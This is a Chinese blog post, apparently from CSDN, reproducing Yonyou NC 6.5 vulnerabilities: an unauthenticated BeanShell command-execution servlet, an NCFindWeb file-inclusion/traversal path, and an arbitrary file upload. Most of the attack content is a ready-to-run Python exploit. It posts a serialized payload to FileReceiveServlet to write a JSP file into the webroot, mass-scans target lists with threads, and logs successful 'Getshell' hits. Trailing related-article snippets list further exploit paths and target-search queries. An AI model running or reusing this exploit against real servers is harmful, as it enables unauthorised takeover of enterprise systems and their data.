用友NC的一些漏洞复现

最新推荐文章于 2024-01-25 16:34:40 发布
最新推荐文章于 2024-01-25 16:34:40 发布
阅读量1.1w 收藏 4
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/121948268
版权

用友NC的一些漏洞复现

一、BeanShell Test Servlet命令执行

漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。

影响范围:NC 6.5版本

复现过程:

访问对应网站后界面如下:

在这里插入图片描述

漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet

在这里插入图片描述

后续还可以写shell进去,但是这里不做测试

二、文件包含

/NCFindWeb?service=IPreAlertConfigService&filename

在这里插入图片描述

修改filename参数可以进一步文件包含

/NCFindWeb?service=IPreAlertConfigService&filename=xxx

在这里插入图片描述

已经是被人上了马了

三、任意文件上传

参考:https://blog.csdn.net/Adminxe/article/details/111177066

import requests
import threadpool
import urllib3
import sys
import argparse
 
urllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "https://google.com",
}
 
def multithreading(funcname, filename="url.txt", pools=5):
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("\n")]
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(funcname, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
 
def wirte_targets(vurl, filename):
    with open(filename, "a+") as f:
        f.write(vurl + "\n")
        return vurl
    
def exp(u):
    uploadHeader = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
        "Content-Type": "multipart/form-data;",
        "Referer": "https://google.com"
    }
    uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"
    shellFlag="t0test0ls"
    uploadData+=shellFlag
    try:
        req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)
        if req1.status_code == 200 :
            req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)
 
            if  req3.text.index(shellFlag)>=0:
                printFlag = "[Getshell]" + u+"/t00ls.jsp"  + "\n"
                print (printFlag)
                wirte_targets(printFlag, "vuln.txt")
    except :
        pass
    #print(printFlag, end="")
 
 
if __name__ == "__main__":
    if (len(sys.argv)) < 2:
        print('useage : python' +str(sys.argv[0]) + ' -h')
    else:
        parser =argparse.ArgumentParser()
        parser.description ='YONYOU UC 6.5 FILE UPLOAD!'
        parser.add_argument('-u',help="url -> example [url]http://127.0.0.1[/url]",type=str,dest='check_url')
        parser.add_argument('-r',help="url list to file",type=str,dest='check_file')
        args =parser.parse_args()
        if args.check_url:
            exp(args.check_url)
        
        if(args.check_file):
            multithreading(exp, args.check_file, 8)
yyyyzzzllll
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 1万+
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现
最新发布
LfanBQX的博客
06-06 423
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。3.网站访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面。2.FOFA上挑选一位存在CNVD-2021-30167漏洞的幸运儿,进行验证。(2)对BeanShell接口添加授权认证机制。貌似所有版本都存在。
nc65命令执行漏洞上传webshell学习笔记
corner55的博客
10-28 3447
命令执行漏洞上传webshell学习笔记,测试环境nc65命令执行漏洞
SRC-用友 ERP-NC NCFindWeb 目录遍历漏洞
hackzkaq的博客
11-06 765
NCFindWeb?service=IPreAlertConfigService&filename=文件名。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。
用友全版本任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-26 2024
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 930
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在。ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友NC BeanShell远程代码执行
09-07
# 用友NC BeanShell远程代码执行 # CNVD-2021-30167 ## 漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.[servlet]...
用友NC65安装操作手册(自己编制)
10-13
用友NC65安装操作手册》是一份详尽的指南,主要针对想要自我学习和测试用友NC65的新手顾问。这份手册涵盖了从安装数据库到配置数据源的整个流程,同时也适用于其他高版本的NCC产品。下面将详细阐述其中的关键步骤...
用友nc数据字典.xls
02-19
用友nc数据字典.xls
用友NC操作流程.pdf
04-05
用友NC操作流程详解》 用友NC是一款先进的企业资源计划系统,广泛应用于大型企业的财务管理、供应链管理、生产制造等多个领域。其操作流程严谨且细致,涉及到多个关键环节,确保了系统的安全性和效率。以下将详细...
用友U8 Cloud 反序列化RCE漏洞复现
0xSec
11-08 3927
用友U8Cloud存在多处(FileManageServlet和LoginVideoServlet)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,结合系统本身存在的反序列化利用链,最终造成远程代码执行。
【0day】复现用友 NC NCFindWeb大型企业数字化平台log4j远程代码执行漏洞
记录并分享学习安全的知识点..
07-24 250
NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。用友 NC NCFindWeb大型企业数字化平台存在log4j远程代码执行漏洞,攻击者可以在恶意环境变量中插入特定的代码,使得Log4j执行该代码。
用友OA漏洞学习——NCFindWeb 目录遍历漏洞
记录并分享学习安全的知识点..
07-03 1400
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
用友NC目录遍历漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-18 2338
简介: 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。 漏洞复现: fofa直接搜索: app="用友-UFIDA-NC" 漏洞拼接目录: /NCFindWeb?service=IPreAlertConfigService&filename /NCFindWeb?service=IPreAlertConfigService&filename= 读取:filename=读取的文件名 ...
用友GRP-U8 ReturnForWcp RCE漏洞复现
0xSec
11-16 1253
用友GRP-U8内控管理软件/servlet/PayReturnForWcp接口处存在xxe漏洞,攻击者可利用xxe漏洞组合内部axis组件的AdminService部署恶意类service,使用外部实体%name来加载"http://xxxx/services/AdminService?method=xx" 远程URL,调用javax.elELProcessor,部署成功后可写入恶意后门文件,可导致服务器失陷。
用友U8 CRM系统help2 任意文件读取漏洞(1day)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-20 605
U8+CRM》是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。软件立足代理销售服务行业管理一体化的高度,以“整合、专业、智能、畅捷”为产品研发理念,弥补了代理销售服务行业信息化管理的空白,为其经营管理的腾飞注入了强大的力量!技术平台采用JAVA跨平台BS应用开发技架构,支持 SQL Server数据库,支持Chrome、 Firefox等各种主流浏览器应用。
用友filereceiveservlet-fileupload-CNVD-2023-85593
qq_36334672的博客
01-25 379
用友NC6.5。
用友nc反序列化漏洞
12-21
用友NC反序列化漏洞是指用友NC软件存在的一种安全漏洞,攻击者可以利用该漏洞向受害者的系统中注入恶意代码,导致系统遭受攻击。该漏洞的成因主要是由于用友NC软件在反序列化过程中存在安全性缺陷,攻击者可以利用这一点来执行未经授权的代码。 攻击者通常会利用一些常见的反序列化漏洞利用技术,如反序列化注入、反序列化利用链等,来利用用友NC软件的漏洞进行攻击。通过构造恶意的序列化数据,攻击者可以在受害者系统中执行恶意代码,包括但不限于执行任意命令、获取系统权限、窃取敏感信息等行为。 为了防范用友NC反序列化漏洞的攻击,用户和系统管理员可以采取一些措施,如及时安装官方发布的安全补丁、加强系统安全配置、限制用户权限、使用安全的序列化与反序列化机制等。另外,对于已知的漏洞利用技术,用户还可以利用防火墙、入侵检测系统等安全设备进行监测和阻断。 总之,要防范用友NC反序列化漏洞的攻击,需要用户和系统管理员密切关注安全动态,及时采取必要的安全措施来保护系统和数据的安全。同时,用友NC软件的开发者也应及时修复这类漏洞,加强软件的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值